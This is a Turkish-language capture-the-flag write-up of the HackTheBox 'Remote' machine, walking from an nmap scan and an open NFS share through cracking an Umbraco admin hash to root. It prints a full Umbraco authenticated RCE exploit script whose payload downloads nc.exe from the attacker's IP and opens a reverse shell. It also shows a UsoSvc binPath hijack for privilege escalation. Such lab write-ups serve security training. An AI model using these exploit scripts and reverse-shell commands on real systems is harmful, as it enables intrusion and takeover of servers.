Önce Nmap ile tarayıp hangi portların açık olduğunu kontrol ediyoruz.
Nmap 7.80 scan initiated Sun Mar 22 07:12:43 2020 as: nmap -sV -sC -p- -T4 -oA nmap 10.10.10.180
Warning: 10.10.10.180 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.10.180
Host is up (0.33s latency).
Not shown: 65519 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
| 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49680/tcp open msrpc Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windowsHost script results:
|clock-skew: 3h32m11s
| smb2-security-mode:
| 2.02:
| Message signing enabled but not required
| smb2-time:
| date: 2020-03-22T02:19:40
|_ start_date: N/AService detection performed. Please report any incorrect results at Nmap OS/Service Fingerprint and Correction Submission Page .
Nmap done at Sun Mar 22 07:49:25 2020 – 1 IP address (1 host up) scanned in 2202.16 seconds
Taramanın sonucunda 21 [FTP], 80 [HTTP API], 111 [RPCBIND] portlarının açık olduğunu görüyoruz.
80 Portuna gittiğimizde bizi bir website karşılıyor.
Daha sonra gobuster toolu ile dizinleri kontrol ediyoruz.
gobuster dir -u remote.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://remote.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/03/22 16:45:11 Starting gobuster
===============================================================
/contact (Status: 200)
/blog (Status: 200)
/products (Status: 200)
/home (Status: 200)
/people (Status: 200)
/Home (Status: 200)
/Products (Status: 200)
/Contact (Status: 200)
/install (Status: 302)
/install dizinine gittiğimizde bizi bir login sayfasına doğru yönlendiriyor.
Basit şifreler ile deneme ile yaptığımızda giriş yapamadık. Exploit-db’de bu ürünü araştırdığımızda Umbraco Authentication Remote Code Execution olduğunu farkettim. Ama login yapamadığımızdan dolayı exploiti kullanamadık. 111 portunda nfs [Network File System] servisini kullanmayı deniyoruz.
apt install nfs-common
nfs-common’u kurup mount etmeyi deniyoruz.
showmount komudu ile mount edebileceğimiz dizinleri listeliyoruz.
showmount -e remote.htb Export list for remote.htb: /site_backups (everyone)
/site_backups dizininin herkeze açık olduğunu görüyoruz.
mkdir mnt && mount -t nfs remote.htb:/site_backups ./mnt
Bir klasör oluşturup mount ediyoruz.
mnt ls -la
total 123
drwx------ 2 nobody 4294967294 4096 Feb 24 03:35 .
drwxr-xr-x 3 root root 4096 Mar 22 17:59 …
drwx------ 2 nobody 4294967294 64 Feb 21 02:16 App_Browsers
drwx------ 2 nobody 4294967294 4096 Feb 21 02:17 App_Data
drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 App_Plugins
drwx------ 2 nobody 4294967294 64 Feb 21 02:16 aspnet_client
drwx------ 2 nobody 4294967294 49152 Feb 21 02:16 bin
drwx------ 2 nobody 4294967294 8192 Feb 21 02:16 Config
drwx------ 2 nobody 4294967294 64 Feb 21 02:16 css
-rwx------ 1 nobody 4294967294 152 Nov 2 2018 default.aspx
-rwx------ 1 nobody 4294967294 89 Nov 2 2018 Global.asax
drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 Media
drwx------ 2 nobody 4294967294 64 Feb 21 02:16 scripts
drwx------ 2 nobody 4294967294 8192 Feb 21 02:16 Umbraco
drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 Umbraco_Client
drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 Views
-rwx------ 1 nobody 4294967294 28539 Feb 20 14:57 Web.config
Mount ettiğimiz dosyaları listeledikten sonra Umraco web servisi ile ilgili config dosyası arıyoruz.
App_Data ls -la total 1977 drwx------ 2 nobody 4294967294 4096 Feb 21 02:17 . drwx------ 2 nobody 4294967294 4096 Feb 24 03:35 .. drwx------ 2 nobody 4294967294 64 Feb 21 02:16 cache drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 Logs drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 Models drwx------ 2 nobody 4294967294 64 Feb 21 02:16 packages drwx------ 2 nobody 4294967294 4096 Feb 21 02:16 TEMP -rwx------ 1 nobody 4294967294 36832 Feb 20 15:59 umbraco.config -rwx------ 1 nobody 4294967294 1965978 Feb 20 15:05 Umbraco.sdf
Biraz zaman harcadıktan sonra config dosyalarını APP_DATA’nın içinde buluyoruz. Ancak config dosyasından bir login bilgisi bulamadık. Umbraco.sdf dosyasını inceledikten sonra bir hash buluyoruz.
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{“hashAlgorithm”:“SHA1”}
Hash İndetifier ile baktığımızda hashin SHA1 olduğunu görüyoruz.
hash-identifier
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
HASH: b8be16afba8c314ad33d812f22a04991b90e2aaa
Possible Hashs:
[+] SHA-1
[+] MySQL5 - SHA-1(SHA-1($pass))
Daha sonra john ile rockyou wordlistini kullanarak hashi kırmayı başarıyoruz.
john hash.txt -w=/usr/share/wordlists/rockyou.txt Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-AxCrypt" Use the "--format=Raw-SHA1-AxCrypt" option to force loading these as that type instead Warning: detected hash type "Raw-SHA1", but the string is also recognized as "Raw-SHA1-Linkedin" Use the "--format=Raw-SHA1-Linkedin" option to force loading these as that type instead Warning: detected hash type "Raw-SHA1", but the string is also recognized as "ripemd-160" Use the "--format=ripemd-160" option to force loading these as that type instead Warning: detected hash type "Raw-SHA1", but the string is also recognized as "has-160" Use the "--format=has-160" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (Raw-SHA1 [SHA1 128/128 XOP 4x2]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status baconandcheese (?) 1g 0:00:00:02 DONE (2020-03-22 18:18) 0.4545g/s 4465Kp/s 4465Kc/s 4465KC/s baconandchipies1..bacon918 Use the "--show --format=Raw-SHA1" options to display all of the cracked passwords reliably Session completed
Daha sonra admin@htb.local kullanıcı adıyla baconandcheese şifresi ile login yapmayı başarıyoruz.
Daha önceden de belirttiğim gibi Umbraco Authenticated Remote Code Execution exploitini kullanıyoruz. [Umbraco CMS 7.12.4 - (Authenticated) Remote Code Execution - ASPX webapps Exploit]
import requests; from bs4 import BeautifulSoup; def print_dict(dico): print(dico.items()); print("Start"); # Execute a calc for the PoC payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \ { string cmd = ""; System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = "calc.exe"; proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\ </xsl:template> </xsl:stylesheet> '; login = "XXXX"; password="XXXX"; host = "XXXX"; s = requests.session() url_main =host+"/umbraco/"; r1 = s.get(url_main); print_dict(r1.cookies); url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"; loginfo = {"username":login,"password":password}; r2 = s.post(url_login,json=loginfo); url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx"; r3 = s.get(url_xslt); soup = BeautifulSoup(r3.text, 'html.parser'); VIEWSTATE = soup.find(id="__VIEWSTATE")['value']; VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']; UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']; headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN}; data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"}; r4 = s.post(url_xslt,data=data,headers=headers); print("End");
Şimdi exploiti kullanabilmek için exploitin gerekli kısımlarını editliyoruz.
* login = “admin@htb.local” * password = “baconandcheese” * host = “http://remote.htb” * string cmd = “mkdir /tmp;iwr -uri http://10.10.15.107:8080/nc.exe -outfile /tmp/nc.exe;/tmp/nc.exe 10.10.15.107 2345 -e powershell” * proc.StartInfo.FileName = “powershell.exe”
Ayrıca internetten nc.exe indirip shell alabilmek için local httpserver kurup [python -m SimpleHTTPServer 8000] karşı sunucuya nc.exe’yi çalıştırmak için exploitin son halini çalıştırıyoruz.
import requests; from bs4 import BeautifulSoup; def print_dict(dico): print(dico.items()); print("Start"); # Execute a calc for the PoC payload = '<?xml version="1.0"?><xsl:stylesheet version="1.0" \ xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" \ xmlns:csharp_user="http://csharp.mycompany.com/mynamespace">\ <msxsl:script language="C#" implements-prefix="csharp_user">public string xml() \ { string cmd = "mkdir /tmp;iwr -uri http://10.10.15.107:8080/nc.exe -outfile /tmp/nc.exe;/tmp/nc.exe 10.10.15.107 2345 -e powershell"; System.Diagnostics.Process proc = new System.Diagnostics.Process();\ proc.StartInfo.FileName = "powershell.exe"; proc.StartInfo.Arguments = cmd;\ proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; \ proc.Start(); string output = proc.StandardOutput.ReadToEnd(); return output; } \ </msxsl:script><xsl:template match="/"> <xsl:value-of select="csharp_user:xml()"/>\ </xsl:template> </xsl:stylesheet> '; login = "admin@htb.local"; password="baconandcheese"; host = "http://remote.htb"; s = requests.session() url_main =host+"/umbraco/"; r1 = s.get(url_main); print_dict(r1.cookies); url_login = host+"/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"; loginfo = {"username":login,"password":password}; r2 = s.post(url_login,json=loginfo); url_xslt = host+"/umbraco/developer/Xslt/xsltVisualize.aspx"; r3 = s.get(url_xslt); soup = BeautifulSoup(r3.text, 'html.parser'); VIEWSTATE = soup.find(id="__VIEWSTATE")['value']; VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']; UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']; headers = {'UMB-XSRF-TOKEN':UMBXSRFTOKEN}; data = {"__EVENTTARGET":"","__EVENTARGUMENT":"","__VIEWSTATE":VIEWSTATE,"__VIEWSTATEGENERATOR":VIEWSTATEGENERATOR,"ctl00$body$xsltSelection":payload,"ctl00$body$contentPicker$ContentIdValue":"","ctl00$body$visualizeDo":"Visualize+XSLT"}; r4 = s.post(url_xslt,data=data,headers=headers); print("End");
[Exploitin son hali]
python -m http.server 8080 Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ... 10.10.10.180 - - [22/Mar/2020 18:39:27] "GET /nc.exe HTTP/1.1" 200 -
Local HTTP Server kuruyoruz.
python exploit.py Start []
Exploiti çalıştırıyoruz.
nc -nlvp 2345 listening on [any] 2345 ... connect to [10.10.15.107] from (UNKNOWN) [10.10.10.180] 49684 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\windows\system32\inetsrv>
Ve sonunda reverse shellimiz geliyor. 
PS C:\users\public> cat user.txt cat user.txt 496--------------------------692f PS C:\users\public>
Userlar’ın içindeki public’in içinde giderek user.txt’yi okuyoruz.
Yetki yükseltmek için hangi servisi kullanacığımızı gösteren winpeas.exe programını karşı sunucuya gönderip çalıştıryoruz. winpeas.exe’yi /tmp klasörüne atabiliyoruz yetkimiz dahilinde.
PS C:\tmp> iwr -uri http://10.10.15.107:8080/winPEAS.exe -outfile winpeas.exe iwr -uri http://10.10.15.107:8080/winPEAS.exe -outfile winpeas.exe PS C:\tmp> ls ls Directory: C:\tmp Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 3/22/2020 9:16 AM 61440 nc.exe -a---- 3/22/2020 9:20 AM 227840 winpeas.exe
Çalıştırdıktan sonra Usosvc servisinin Administrator yetkisinde çalıştığını görüyoruz.
[+] Modifiable Services(T1007) [?] Check if you can modify any service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services LOOKS LIKE YOU CAN MODIFY SOME SERVICE/s: UsoSvc: AllAccess
PS C:\windows\system32\inetsrv> sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe" sc.exe config usosvc binPath="C:\tmp\nc.exe 10.10.15.107 4444 -e powershell.exe" [SC] ChangeServiceConfig SUCCESS PS C:\windows\system32\inetsrv> sc.exe stop usosvc sc.exe stop usosvc SERVICE_NAME: usosvc TYPE : 30 WIN32 STATE : 3 STOP_PENDING (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x3 WAIT_HINT : 0x7530 PS C:\windows\system32\inetsrv> sc.exe start usosvc sc.exe start usosvc
Usosvc servisinin config’ine nc.exe ile reverse shell kodumuzu enjekte ediyoruz.
Servisi durduruyoruz.
Tekrar çalıştırıyoruz.
nc -nlvp 4444 listening on [any] 4444 ... connect to [10.10.15.107] from (UNKNOWN) [10.10.10.180] 49691 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved. PS C:\Windows\system32> type C:\users\Administrator\Desktop\root.txt type C:\users\Administrator\Desktop\root.txt 8e3---------------------------9ef1 PS C:\Windows\system32>
Ve en sonunda Administrator reverse shellimiz geldikten sonra root.txt’yi okuyoruz.